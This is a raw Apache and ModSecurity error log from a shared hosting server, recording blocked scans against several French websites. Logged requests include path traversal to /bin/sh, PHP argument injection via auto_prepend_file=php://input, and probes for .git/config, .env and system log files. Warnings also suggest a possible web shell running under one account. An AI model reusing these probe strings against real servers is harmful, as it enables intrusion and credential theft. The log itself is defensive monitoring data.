[Mon May 11 21:52:29.525525 2026] [security2:error] [pid 1590352:tid 1590401] [client 206.189.6.126:58742] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agIzfa1q0G_aXAqWauTuJwAAAIk"]
[Mon May 11 21:52:29.525781 2026] [security2:error] [pid 1590352:tid 1590401] [client 206.189.6.126:58742] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agIzfa1q0G_aXAqWauTuJwAAAIk"]
[Mon May 11 21:53:10.590638 2026] [security2:error] [pid 1534836:tid 1534871] [client 216.73.216.117:37188] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: adf11bdf8b41be8afe20bd8c5c5ed07d||1778530989||1778530629"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/sitemap_index.xml"] [unique_id "agIzpteaRXe5lR8y0ZOqEQAAAUE"]
[Mon May 11 21:53:10.590952 2026] [security2:error] [pid 1534836:tid 1534871] [client 216.73.216.117:37188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/sitemap_index.xml"] [unique_id "agIzpteaRXe5lR8y0ZOqEQAAAUE"]
[Mon May 11 21:53:10.957560 2026] [security2:error] [pid 1534836:tid 1534871] [client 216.73.216.117:37188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIzpteaRXe5lR8y0ZOqEQAAAUE"]
[Mon May 11 21:54:00.074958 2026] [security2:error] [pid 1601130:tid 1601171] [client 43.133.187.11:39494] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agIz2HEgAO_835W6c1mKEgAAAFU"]
[Mon May 11 21:54:07.145086 2026] [security2:error] [pid 1534836:tid 1534885] [client 43.133.187.11:44000] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agIz39eaRXe5lR8y0ZOqVwAAAU4"], referer: http://castiglionecorporatefinance.fr
[Mon May 11 21:54:13.169663 2026] [security2:error] [pid 1601130:tid 1601172] [client 43.133.187.11:53610] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agIz5XEgAO_835W6c1mKFAAAAFY"], referer: https://castiglionecorporatefinance.fr/
[Mon May 11 21:54:24.203592 2026] [security2:error] [pid 1588898:tid 1588900] [client 101.33.66.34:35672] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.culturesvoile.com"] [uri "/"] [unique_id "agIz76FW67LJTsgN3jQB8gAAAAA"], referer: http://www.culturesvoile.com
[Mon May 11 21:55:24.715256 2026] [security2:error] [pid 1534836:tid 1534883] [client 98.82.66.172:26466] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:php echo BASEFRONT ?>forum/afficheSujet.php?sujet. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:php echo BASEFRONT ?>forum/afficheSujet.php?sujet: <?php echo $sujetid ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agI0LNeaRXe5lR8y0ZOqvwAAAUw"]
[Mon May 11 21:55:24.717133 2026] [security2:error] [pid 1534836:tid 1534883] [client 98.82.66.172:26466] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agI0LNeaRXe5lR8y0ZOqvwAAAUw"]
[Mon May 11 21:55:24.836580 2026] [security2:error] [pid 1534836:tid 1534883] [client 98.82.66.172:26466] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: PHP Open Tag Found"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agI0LNeaRXe5lR8y0ZOqvwAAAUw"]
[Mon May 11 21:55:45.166536 2026] [security2:error] [pid 1588898:tid 1588911] [client 43.153.113.127:38288] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/politique-de-confidentialite/"] [unique_id "agI0QaFW67LJTsgN3jQCVAAAAAw"]
[Mon May 11 21:56:16.884410 2026] [core:crit] [pid 1516058:tid 1516102] (13)Permission denied: [client 34.135.245.234:42552] AH00529: /home/krakouka/public_html/wordpress/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home/krakouka/public_html/wordpress/' is executable, referer: http://mail.krakoukas.com/wordpress/
[Mon May 11 21:56:39.303838 2026] [ssl:error] [pid 1516058:tid 1516111] (EAI 2)Name or service not known: [client 192.178.6.8:63915] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:56:39.303890 2026] [ssl:error] [pid 1516058:tid 1516111] AH01941: stapling_renew_response: responder error
[Mon May 11 21:56:39.791263 2026] [ssl:error] [pid 1534836:tid 1534892] (EAI 2)Name or service not known: [client 192.178.6.9:49220] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:56:39.791313 2026] [ssl:error] [pid 1534836:tid 1534892] AH01941: stapling_renew_response: responder error
[Mon May 11 21:56:41.223967 2026] [ssl:error] [pid 1590352:tid 1590405] (EAI 2)Name or service not known: [client 192.178.6.9:52397] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:56:41.224012 2026] [ssl:error] [pid 1590352:tid 1590405] AH01941: stapling_renew_response: responder error
[Mon May 11 21:56:41.801779 2026] [ssl:error] [pid 1534836:tid 1534882] (EAI 2)Name or service not known: [client 192.178.6.8:58028] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:56:41.801802 2026] [ssl:error] [pid 1534836:tid 1534882] AH01941: stapling_renew_response: responder error
[Mon May 11 21:56:42.588074 2026] [core:error] [pid 1601130:tid 1601163] [client 47.89.177.48:12092] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Mon May 11 21:56:42.792691 2026] [core:error] [pid 1534836:tid 1534875] [client 47.89.177.48:12098] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Mon May 11 21:56:43.077893 2026] [security2:error] [pid 1588898:tid 1588915] [client 47.89.177.48:12106] ModSecurity: Warning. Matched phrase "=" at ARGS_NAMES:\\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "71"] [id "933120"] [rev "1"] [msg "PHP Injection Attack: Configuration Directive Found"] [data "Matched Data: = found within ARGS_NAMES:\\x5c\\x5cxadd allow_url_include=1 \\x5c\\x5cxadd auto_prepend_file=php://input: \\xadd allow_url_include=1 \\xadd auto_prepend_file=php:/input"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "217.113.192.26"] [uri "/hello.world"] [unique_id "agI0e6FW67LJTsgN3jQCqgAAABA"]
[Mon May 11 21:56:43.078075 2026] [security2:error] [pid 1588898:tid 1588915] [client 47.89.177.48:12106] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\\xadd allow_url_include=1 \\xadd auto_prepend_file=php://input. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://input found within ARGS_NAMES:\\x5cxadd allow_url_include=1 \\x5cxadd auto_prepend_file=php://input: \\xadd allow_url_include=1 \\xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "217.113.192.26"] [uri "/hello.world"] [unique_id "agI0e6FW67LJTsgN3jQCqgAAABA"]
[Mon May 11 21:56:43.078639 2026] [security2:error] [pid 1588898:tid 1588915] [client 47.89.177.48:12106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/hello.world"] [unique_id "agI0e6FW67LJTsgN3jQCqgAAABA"]
[Mon May 11 21:56:43.091455 2026] [security2:error] [pid 1588898:tid 1588915] [client 47.89.177.48:12106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=10,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI0e6FW67LJTsgN3jQCqgAAABA"]
[Mon May 11 21:56:45.430740 2026] [ssl:error] [pid 1534836:tid 1534893] (EAI 2)Name or service not known: [client 192.178.6.7:63697] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:56:45.430778 2026] [ssl:error] [pid 1534836:tid 1534893] AH01941: stapling_renew_response: responder error
[Mon May 11 21:56:45.902698 2026] [ssl:error] [pid 1590352:tid 1590412] (EAI 2)Name or service not known: [client 192.178.6.7:36618] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:56:45.902737 2026] [ssl:error] [pid 1590352:tid 1590412] AH01941: stapling_renew_response: responder error
[Mon May 11 21:56:46.438359 2026] [ssl:error] [pid 1601130:tid 1601169] (EAI 2)Name or service not known: [client 192.178.6.7:37928] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:56:46.438410 2026] [ssl:error] [pid 1601130:tid 1601169] AH01941: stapling_renew_response: responder error
[Mon May 11 21:56:46.973666 2026] [ssl:error] [pid 1588898:tid 1590048] (EAI 2)Name or service not known: [client 192.178.6.8:45460] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:56:46.973701 2026] [ssl:error] [pid 1588898:tid 1590048] AH01941: stapling_renew_response: responder error
[Mon May 11 21:56:58.086844 2026] [ssl:error] [pid 1590352:tid 1590411] (EAI 2)Name or service not known: [client 192.178.6.7:52047] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:56:58.086885 2026] [ssl:error] [pid 1590352:tid 1590411] AH01941: stapling_renew_response: responder error
[Mon May 11 21:56:58.603564 2026] [ssl:error] [pid 1601130:tid 1601172] (EAI 2)Name or service not known: [client 192.178.6.7:45865] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:56:58.603601 2026] [ssl:error] [pid 1601130:tid 1601172] AH01941: stapling_renew_response: responder error
[Mon May 11 21:57:47.255515 2026] [security2:error] [pid 1590352:tid 1590393] [client 43.134.127.70:54728] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/oreillers/"] [unique_id "agI0u61q0G_aXAqWauTwfQAAAIE"]
PHP Warning:  filesize(): stat failed for /proc/694/task/694/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/694/task/694/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/694/task/694/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/694/task/694/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/694/task/694/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/694/task/694/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/209/task/209/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/209/task/209/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/209/task/209/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/209/task/209/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/209/task/209/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/209/task/209/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 21:58:09.714865 2026] [authz_core:error] [pid 1516058:tid 1516109] [client 216.73.216.110:57685] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/template/default/auth/error_log
PHP Warning:  filesize(): stat failed for /proc/968/task/968/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/968/task/968/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/968/task/968/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/968/task/968/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/968/task/968/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/968/task/968/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 21:58:41.146937 2026] [autoindex:error] [pid 1601130:tid 1601151] [client 66.249.75.166:41967] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 21:58:41.665957 2026] [autoindex:error] [pid 1588898:tid 1588918] [client 66.249.75.167:62788] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 21:58:42.212078 2026] [:error] [pid 1601130:tid 1601151] [client 66.249.75.166:41967] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 21:58:58.406098 2026] [:error] [pid 1590352:tid 1590404] [client 114.119.140.137:38709] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=clientarea&systpl=six&language=spanish
[Mon May 11 21:59:20.803018 2026] [authz_core:error] [pid 1601130:tid 1601154] [client 52.167.144.147:58310] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/html-api/error_log
[Mon May 11 21:59:34.455754 2026] [security2:error] [pid 1590352:tid 1590396] [client 216.73.216.110:2104] ModSecurity: Warning. Matched phrase "var/log/boot.log" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/boot.log found within ARGS:filesrc: /var/log/boot.log-20240224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agI1Jq1q0G_aXAqWauTxEQAAAIQ"]
[Mon May 11 21:59:34.457583 2026] [security2:error] [pid 1590352:tid 1590396] [client 216.73.216.110:2104] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agI1Jq1q0G_aXAqWauTxEQAAAIQ"]
[Mon May 11 21:59:34.554100 2026] [security2:error] [pid 1590352:tid 1590396] [client 216.73.216.110:2104] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agI1Jq1q0G_aXAqWauTxEQAAAIQ"]
[Mon May 11 21:59:56.208268 2026] [security2:error] [pid 1588898:tid 1588909] [client 43.166.244.251:39338] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/st-jacques.html"] [unique_id "agI1PKFW67LJTsgN3jQDiwAAAAo"]
[Mon May 11 22:00:12.589984 2026] [:error] [pid 1588898:tid 1588913] [client 114.119.136.64:34001] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=index&rp=%2Fknowledgebase%2Ftag%2FConfiguration-de-Filezilla&systpl=six&language=portuguese-pt
[Mon May 11 22:01:22.033241 2026] [security2:error] [pid 1590352:tid 1590407] [client 43.135.142.37:34090] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/thumb/100-115-100-1-/wp-content/uploads/2018/05/t"] [unique_id "agI1kq1q0G_aXAqWauTyCgAAAI8"]
[Mon May 11 22:01:30.492851 2026] [security2:error] [pid 1601130:tid 1601153] [client 43.153.35.128:47666] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI1mnEgAO_835W6c1mNfQAAAEM"]
[Mon May 11 22:01:33.549115 2026] [:error] [pid 1601130:tid 1601174] [client 114.119.146.171:31841] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=cart&gid=5&systpl=six&language=catalan
[Mon May 11 22:01:48.828538 2026] [security2:error] [pid 1588898:tid 1588922] [client 193.111.117.35:21320] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.staging.local"] [unique_id "agI1rKFW67LJTsgN3jQETQAAABg"]
